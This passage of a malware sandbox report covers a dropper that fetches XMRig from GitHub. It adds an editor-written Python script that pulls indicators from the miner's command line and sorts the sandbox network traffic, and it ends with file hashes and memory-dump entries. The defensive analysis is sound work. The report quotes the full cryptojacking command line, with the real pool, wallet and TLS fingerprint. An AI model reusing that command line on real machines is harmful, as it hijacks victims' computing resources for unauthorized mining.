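The xmrig.exe command line in the Processes sections of behavioral13 and behavioral14 above, together with their Network tables, worked through as an added example. This is editor-written Python, not part of the sandbox report, of the dropper, or of the XMRig project. It parses the miner flags into the pool, wallet and pinned TLS fingerprint, checks that the wallet has the shape of a Monero address (length, prefix and base58 alphabet only; the checksum is not verified) and that the fingerprint is the 64-hex-digit SHA-256 value `--tls-fingerprint` expects, then sorts the Network rows into DNS lookups, pool connections, other connections and sandbox noise. The sample rows are copied from the two tables; treating `in-addr.arpa` reverse lookups and `bing.*` traffic as sandbox background rather than sample behaviour is an assumption about this Windows 10 image.

```python
"""Added example: IOC extraction and network triage for the XMRig runs above."""
import re

# Sample input copied from the Processes section (identical in both runs).
XMRIG_CMDLINE = (
    "xmrig-6.21.0\\xmrig.exe --url pool.hashvault.pro:80 "
    "--user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR "
    "--pass T --donate-level 1 --tls "
    "--tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14"
)

# Sample input: Network rows copied from behavioral13 and behavioral14.
NETWORK_ROWS = """\
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
"""

# Assumption: traffic this sandbox's Windows image generates by itself.
BACKGROUND_DOMAIN_SUFFIXES = (".bing.com", ".bing.net")

# Monero addresses use the Bitcoin base58 alphabet (no 0, O, I, l); mainnet
# standard and integrated addresses start with '4', subaddresses with '8'.
_B58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")
_ROW = re.compile(r"^\|\s*(\w+)\s*\|\s*([^|]+?)\s*\|\s*([^|]+?)\s*\|\s*(\w+)\s*\|\s*$")
_FLAG = re.compile(r"--([\w-]+)(?:=(\S+)|\s+(?!--)(\S+))?")


def parse_xmrig_cmdline(cmdline: str) -> dict:
    """Map --flag value, --flag=value and bare --flag to a dict; argv[0] under 'exe'."""
    exe, _, rest = cmdline.partition(" ")
    opts = {"exe": exe}
    for name, eq_val, sp_val in _FLAG.findall(rest):
        opts[name] = eq_val or sp_val or True   # bare flags such as --tls become True
    return opts


def looks_like_monero_address(addr: str) -> bool:
    """Format check only (length, prefix, alphabet); no checksum verification."""
    shape_ok = (len(addr) == 95 and addr[0] in "48") or (len(addr) == 106 and addr[0] == "4")
    return shape_ok and all(ch in _B58 for ch in addr)


def extract_iocs(cmdline: str) -> dict:
    """Pool, wallet and pinned certificate fingerprint from the miner flags."""
    opts = parse_xmrig_cmdline(cmdline)
    host, _, port = str(opts.get("url", "")).rpartition(":")
    wallet = str(opts.get("user", ""))
    fp = str(opts.get("tls-fingerprint", ""))
    return {
        "pool_host": host,
        "pool_port": int(port) if port.isdigit() else None,
        "wallet": wallet,
        "wallet_format_ok": looks_like_monero_address(wallet),
        "tls": opts.get("tls") is True,
        # --tls-fingerprint pins the pool certificate by its SHA-256 (64 hex chars).
        "tls_fingerprint": fp if re.fullmatch(r"[0-9a-f]{64}", fp) else None,
    }


def triage_network(rows: str, pool_host: str) -> dict:
    """Sort Network rows into pool connections, DNS lookups and sandbox noise."""
    pool, dns, other = [], [], []
    ptr_noise = background = 0
    for m in filter(None, map(_ROW.match, rows.splitlines())):
        _country, dest, domain, proto = m.groups()
        ip, _, port_s = dest.rpartition(":")
        port = int(port_s)
        if domain.endswith(".in-addr.arpa"):
            ptr_noise += 1                  # reverse lookups the sandbox performs itself
        elif domain.endswith(BACKGROUND_DOMAIN_SUFFIXES):
            background += 1
        elif proto == "udp" and port == 53:
            dns.append(domain)
        elif domain == pool_host:
            pool.append((ip, port))         # the miner actually reached its pool
        else:
            other.append((domain, ip, port))
    return {"pool_connections": sorted(pool), "dns_queries": dns, "other_connections": other,
            "ptr_noise": ptr_noise, "background": background}


def summarize(cmdline: str = XMRIG_CMDLINE, rows: str = NETWORK_ROWS) -> dict:
    """Combine both views: IOCs from the command line, confirmed by the traffic."""
    iocs = extract_iocs(cmdline)
    net = triage_network(rows, str(iocs["pool_host"]))
    iocs["pool_reached"] = bool(net["pool_connections"])
    return {"iocs": iocs, "network": net}


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(), indent=2))
```

Run as-is it shows that both detonations resolved pool.hashvault.pro and connected to it on TCP/80 (95.179.241.203 in behavioral13, 45.76.89.70 in behavioral14), so the miner reached its pool under the pinned certificate; the only other connections are github.com and objects.githubusercontent.com, which precede the drop of xmrig-6.21.0\xmrig.exe and are consistent with the dropper fetching the release archive. The wallet, pool host and certificate fingerprint are the durable indicators here; the pool IPs rotate between runs. Two signatures above deserve a caveat when this report is turned into detections: the SeLockMemoryPrivilege adjustment is XMRig enabling huge pages, expected miner behaviour rather than a separate privilege step; and the AuthRoot\Certificates write attributed to main - Copy (7).exe has the shape of CryptoAPI's automatic root-certificate update, which runs in the context of whichever process validates a TLS chain whose root is not yet cached locally (the GitHub download here), so on its own it is not evidence that the dropper installed a trust anchor.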
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4928-16-0x000001CF71F00000-0x000001CF71F20000-memory.dmp
memory/4928-17-0x000001CF738F0000-0x000001CF73910000-memory.dmp
memory/4928-18-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-20-0x000001CF73930000-0x000001CF73950000-memory.dmp
memory/4928-19-0x000001CF73910000-0x000001CF73930000-memory.dmp
memory/4928-21-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-22-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-25-0x000001CF73930000-0x000001CF73950000-memory.dmp
memory/4928-24-0x000001CF73910000-0x000001CF73930000-memory.dmp
memory/4928-23-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-26-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-27-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-28-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-29-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-30-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-31-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-32-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-33-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-34-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-35-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-36-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-37-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-38-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-39-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-40-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-41-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-42-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-43-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-44-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-45-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-46-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-47-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-48-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-49-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-50-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-51-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-52-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-53-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-54-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-55-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-56-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-57-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-58-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-59-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-60-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-61-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-62-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-63-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-64-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-65-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-66-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-67-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-68-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-69-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-70-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-71-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-72-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-73-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-74-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-75-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-76-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-77-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-78-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-79-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-80-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-81-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-82-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-83-0x00007FF65E580000-0x00007FF65F083000-memory.dmp
memory/4928-84-0x00007FF65E580000-0x00007FF65F083000-memory.dmp